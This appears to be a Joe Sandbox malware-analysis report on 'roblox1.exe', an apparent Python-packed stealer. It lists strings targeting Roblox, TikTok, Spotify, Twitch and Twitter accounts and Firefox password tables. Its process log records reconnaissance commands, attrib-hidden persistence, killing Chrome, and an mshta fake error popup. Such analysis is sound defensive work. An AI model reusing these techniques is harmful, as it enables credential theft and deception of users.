                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonareqadescriptionuThere
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.com/u
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-fe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014DE000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953361364.00007FFBA9F1A000.00000002.00000001.01000000.00000013.sdmp, stub.exe, 00000003.00000002.1954523023.00007FFBAA267000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.openssl.org/H
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945949280.00000213BE750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0506/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedaprofileUrlu
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhtt
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profileatextaloadsaprofileagenderabirthdateu
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.twitch.tv/adisplayNameahasPrimeaisPartneralanguageaprofileImageURLabitsBalanceatotalCoun
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
                  Source: stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936493443.00000213BEEF3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                  Source: stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeCode function: 3_2_00007FFBAAF173D03_2_00007FFBAAF173D0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_00007FFB49712CA956_2_00007FFB49712CA9
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd 3B0661EF2264D6566368B677C732BA062AC4688EF40C22476992A0F9536B0010
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeCode function: String function: 00007FFBAAF29DB0 appears 43 times
                  Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Monster.exe.3.drStatic PE information: Number of sections : 12 > 10
                  Source: roblox1.exeStatic PE information: Number of sections : 12 > 10
                  Source: stub.exe.0.drStatic PE information: Number of sections : 12 > 10
                  Source: python3.dll.0.drStatic PE information: No import functions for PE file found
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs roblox1.exe
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: classification engineClassification label: mal100.spre.phis.troj.spyw.evad.winEXE@110/57@2/3
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\MonsterUpdateService\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6864:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeMutant created: \Sessions\1\BaseNamedObjects\M
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316Jump to behavior
                  Source: roblox1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\quser.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\roblox1.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: stub.exe, 00000003.00000003.1690926482.00000213BEDDA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947473880.00000213BEDC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: roblox1.exeReversingLabs: Detection: 55%
                  Source: stub.exeString found in binary or memory: can't send non-None value to a just-started generator
                  Source: unknownProcess created: C:\Users\user\Desktop\roblox1.exe "C:\Users\user\Desktop\roblox1.exe"
                  Source: C:\Users\user\Desktop\roblox1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\roblox1.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe C:\Users\user\Desktop\roblox1.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
